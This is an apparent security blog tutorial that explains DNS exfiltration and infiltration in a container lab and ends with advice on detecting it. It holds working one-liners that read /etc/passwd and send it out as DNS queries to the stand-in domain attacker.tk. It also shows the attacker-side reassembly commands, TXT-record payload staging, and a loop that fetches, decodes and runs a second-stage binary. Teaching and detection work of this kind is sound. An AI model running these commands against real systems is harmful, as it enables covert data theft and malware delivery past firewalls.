Floating point

Introduction to DNS exfiltration and infiltration

Carlo Mandelli
03 Dec, 2021
08 Mins read

We all know that an infected endpoint can gain access to sensitive data, but how to get them out?

Usually malwares try to send collected data directly via HTTP protocol to the attacker control server but have you ever wondered how they can do it from an endpoint bypassing the corporate firewall where all HTTP traffic is denied?

Well, practically all environments allow DNS requests through their firewalls. Each application, even if it doesn’t have to contact external services, needs to resolve hostnames to IPs and vice versa.

But usually internal DNS are configured to forward requests they don’t know the answer to other external DNS which are authoritative for that particular domain. If you query an internal DNS for a record it owns (and in our lab it will be authoritative for the whole acme.corp domain) like that:

💉 app@server ~ $ dig +short db.acme.corp
172.21.0.153

the internal DNS will answer you directly:

🌍 root@dns  # tail -f /var/log/dnsmasq.log 
Nov 25 10:53:42 dnsmasq[1]: query[A] db.acme.corp from 172.21.0.3
Nov 25 10:53:42 dnsmasq[1]: config db.acme.corp is 172.21.0.153

but if you ask a record it doesn’t know:

💉 app@server ~ $ dig +short www.google.com
142.250.180.68

it will forward the request through the DNS chain to get the answer:

🌍 root@dns  # tail -f /var/log/dnsmasq.log 
Nov 25 10:54:55 dnsmasq[1]: query[A] www.google.com from 172.21.0.3
Nov 25 10:54:55 dnsmasq[1]: forwarded www.google.com to 8.8.8.8
Nov 25 10:54:55 dnsmasq[1]: reply www.google.com is 142.250.180.68

The flow of network traffic seen in this example can be resumed into the following simplified scheme:

So what happens if an attacker owns a domain (in our example it will be “attacker.tk”), manage the authoritative DNS for that zone and simply enables logging of received queries? He will be able to get the data out from the infected endpoint forging queries with embedded data via DNS traffic bypassing firewall blocks.

Nowadays you can buy a real domain and spin up a Linux server in the cloud for few bucks but for the demo I created a lab based on containers emulating three servers: the infected endpoint at Acme Corp (💉 server), the internal DNS at Acme Corp (🌍 dns) and the attacker DNS/controller (💀dns). I also created two separate networks (internal and external) to simulate the firewall.

The attacker DNS server is already configured to log every query it receives (I’ve used dnsmasq for simplicity but you could use whatever you prefer like Bind, Unbound, CoreDns, etc.).

If you want to follow this article in “hands-on” mode the whole lab, code and examples can be downloaded from a git repository [1].

Ok, let’s say the malware on the Acme server discovered ** whateveryouwant** as a plain text password and wants to get it out. It then inserts the password as part of the name, it asks the DNS to resolve in the attacker.tk domain:

💉 app@server ~ $ dig +short whateveryouwant.attacker.tk
172.21.1.155

Acme DNS will forward the query to the external DNS managed by the attacker:

🌍 root@dns  # tail -f /var/log/dnsmasq.log 
Nov 25 10:58:52 dnsmasq[1]: query[A] whateveryouwant.attacker.tk from 172.21.0.3
Nov 25 10:58:52 dnsmasq[1]: forwarded whateveryouwant.attacker.tk to 172.21.1.3
Nov 25 10:58:52 dnsmasq[1]: reply whateveryouwant.attacker.tk is 172.21.1.155

and, in the attacker DNS server, we can see we got our password:

💀 root@dns  # tail -f /var/log/dnsmasq.log
Nov 25 10:58:52 dnsmasq[1]: query[A] whateveryouwant.attacker.tk from 172.21.1.2
Nov 25 10:58:52 dnsmasq[1]: config whateveryouwant.attacker.tk is 172.21.1.155

This technique is called DNS exfiltration.

As you may have noticed on the attacker DNS the query came from the IP 172.21.1.2 which belongs to Acme DNS server not to the infected endpoint (which is 172.21.0.3). That’s why it can go out, the firewall rules allow DNS to pass, but not the clients.

To hide the data we are sending out we can divide it into different chunks then mix it with other random data to add noise and also encrypt them. As long as we know the algorithm used we will be always able to decode it.

Let’s see an example where our data (the same whateveryouwant string) is split into blocks of four chars each (using “zero” as padding) where the real information is placed after 10 random characters and followed by other five. Now the same result we got before can be achieved making 5 different queries:

kjhdcmjdhcwhatcjhja.attacker.tk

ounmndbbvcevercjhja.attacker.tk

gndndgbvctyouwcjsja.attacker.tk

sgnjnkgbvcant0cksja.attacker.tk

In this way it’s not immediately clear for a defender to see what we are getting out but using multiple queries we could face a problem since the DNS protocol is used mostly over UDP, there is no guarantee that the queries will be replied based on their arrival order:

kjhdcmjdhcwhatcjhja.attacker.tk

gndndgbvctyouwcjsja.attacker.tk

ounmndbbvcevercjhja.attacker.tk

sgnjnkgbvcant0cksja.attacker.tk

In this case reading sequentially from log file we’ll reassemble the chunks in a wrong order and end up with something like whatyouweverant0 that’s not what we sent.

To fix that we need to forge our queries inserting an index that will help us to reassemble all the chunks in the correct order. In our case the simpliest method is adding an index at the beginning of the name. So even if we receive them in the wrong order we’ll be able to sort them in the correct way:

1jhdcmjdhcwhatcjhja.attacker.tk

3ndndgbvctyouwcjsja.attacker.tk

2unmndbbvcevercjhja.attacker.tk

4gnjnkgbvcant0cksja.attacker.tk

A DNS query can contain only the valid characters up to a total of 255 with a maximum of 63 for each subdomain [2]. For now we have only used regular strings and no subdomain but we can create more complex queries like this:

<random><chunk1>.<random><index-in-hex>.<random><chunk2>.<random>.attacker.tk

In this way we can send out more data in a single query .

Infected endpoints may have softwares that collects as much data as they can about the server itself but also its environment (this phase is called “enumeration”). This is useful to get access to other servers in the same network and maybe get more important data (this is called “lateral moving”).

So what if we need to get out a whole report file? Well, the procedure is very similar.

The infected endpoint compresses and encodes the data, breaks it down into chunks and sends each chunk out with specific queries.

On the other side, on the DNS managed by the attacker, has to do the same procedure but in an inverted order. It extracts the queries from DNS log file, reassembles the chunks into a single stream then decodes and decompresses it. At the end you will have the original file.

Let’s say we want to send out a big /etc/passwd file to collect all the local users of that server.

To achieve that we decided to use commonly used Linux commands which are installed by default on most distros.

First we compress the file with gzip command to reduce its size. Then we’ll convert the compressed binary stream into something we can use in a query and here base64, a very common binary-to-text (and vice versa) encoding, comes in help . Now we have to split our encoded string into 63 chars chucks using fold command and finally with awk to forge our queries with a simple marker “c” followed by the three digit index.

Here an example on how each command should look:

## query as <maker><index>.<payload>.attacker.tk
dig +short c100.H4sIAAAAAAAAA3WT226jMBCG73mKPEAkYw5p4wfYq9WqUrtSbw04hZWNXR/S5O3.attacker.tk

And, using pipes, we can send the whole file in a single line command:

gzip -c /etc/passwd | base64 -w0 | fold -w63 | awk 'BEGIN {n = 100} {print "dig +short c"n"."$1".attacker.tk"; n++}' | sh

at this point on the DNS attacker server we should see log entries like this one:

Nov 25 09:51:48 dnsmasq[1]: query[A] c108.HiqfuDSWc1ejzeNTPEOkzL+Hi28Ry02bFs8/by+JFsr4e1kUpRz2pj7jmfyunuo.attacker.tk from 172.21.1.2

So, to get the file back, we need to execute all the steps in the opposite order. First by finding all lines we are interested in from DNS log files (using grep with our simple “c???” marker), with awk extract only the query strings needed and use sort command to get them in the correct order. Once ordered get rid of all chars but the payload part with cut, we use base64 to decode from text to binary and decompress the resulting flow to get the original file.

Even that can be done with a single line command:

grep -E "^query\[A\] c\d{3}\." /var/log/dnsmasq.log | awk '{print $6}' | sort -u | cut -d "." -f2 | base64 -d | gunzip -d > mynewfile

head -3 mynewfile
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin

Now we know that we can exploit DNS to get data out from our infected endpoint but what if we need to get something in?

Common attacks are set in multiple stages. The first stage payload is usually a small script (sometimes simply written in Bash or Powershell) that gets the so called “second stage payload”. This is the piece of code which does the real job (a binary to encrypt all data, a crypto currency miner and so on).

So the question is can we download a binary through DNS queries? The answer is yes, if the attacker DNS has been prepared to answer in the correct way to particular queries. This technique is called DNS infiltration.

For now our queries were all of A type (the default, if not specified in dig), which means “what is the address of this hostname?” and the reply is the IP (in version 4, type AAAA is for IPv6). But there are a lot of other query types managed by DNS. For instance CNAME for aliases, PTR for reverting from IP to name or NS for authoritative name servers.

But in this particular case it comes in help the TXT record [3]. As the name says it can store ASCII text in DNS records. And now we know we can “transform” every file into text, as we did before with base64 command, and store them as TXT records.

Let’s say the attacker created a statically compiled malware, compressed and normalized it. He split it into chunks and created a TXT record for every chunk (these are for dnsmasq, the correct syntax depends on DNS software you are using) :

txt-record=c100.attacker.tk,H4sIAAAAAAAAA+ydC3Bc1XnH7+phL7a8EiA7wpj4mpFhZaGX8UN+yN6VZbgiplL
txt-record=c101.attacker.tk,xA7WWWQlpbSnoNdIKC9gYTdYmWtabqEkno2ZoR6UvhT7QTFoqOiFIlrGEh5A1DI
<...>
txt-record=c222.attacker.tk,VXX8v1aw6N88085ifwN99/jHXxI6xXP7Rv3zF1/l7gFS/+Ss8E6GYAAA==

At this point on the infected endpoint the attacker (or more precisely the first stage script) will simply execute TXT queries in the correct order (and it knows the payload is formed by 122 chunks indexed from 100 to 222). Every response will contain one chunk, so by doing the inverse procedure we’ll get the complete binary file directly into our infected server:

💉 app@server ~ $ for n in $(seq 100 222);do echo "dig txt +short c$n.attacker.tk" ;done | sh | tr -d '"' | base64 -d | gzip -d > malware

You can run it (obviously it’s not a real malware) and you’ll see a nice steam locomotive crossing your terminal:

💉 app@server ~ $ chmod +x malware && ./malware

Please remember all the manual steps we did so far were just to show how it works. In real cases we can use softwares made for this purpose like dnsteal or DNSStager.

We’re almost at the end of this journey but I would like to spend some word on how to mitigate this issue.

The difficulty in identifying this kind of attack lies on the fact that it is not easy to be hundred percent sure of what we are facing based on just a single request. It may contain anomaly elements (like its size) but usually it doesn’t prove anything for sure. Instead we have to analyze the whole traffic flow (and/or log files) and inspect the payloads to identify anomalies or specific patterns that differ from the usual trends.

Let’s see some key points that we should consider in our traffic analyze.

One well known anomaly could be the packet size (or query length if we are analyzing log files). Usually domain names tend to be short in order to be easy to remember so something bigger than usual could be a good clue to investigate into.

Another inconsistency could be spotted in the frequency of requests. Most of the time a client will ask a small set of queries for different domains (ex. one for web pages, one for images, one for styles and so on) but then even when the URL will change all the domains will remain the same for the whole session. A particular intense “chat” between a client and a DNS will generate a spike in the requests’ frequency and so it could mean something strange is happening.

And finally also the not-so-common queries could trigger an alarm ring bell. Usually clients ask queries based on a limited type range. Mostly should be of type A or PTR, but rarely they’ll ask for TXT records. That’s should be another sign of anomaly.

I hope you discovered something that was of interest to you. If you have any further questions don’t hesitate to contact me.

That’s really all for now. Thanks guys.

References:

[1] https://github.com/camandel/dns-security-demo

[2] https://datatracker.ietf.org/doc/html/rfc1035#section-2.3.4

[3] https://datatracker.ietf.org/doc/html/rfc1035#section-3.3.14

Prev Next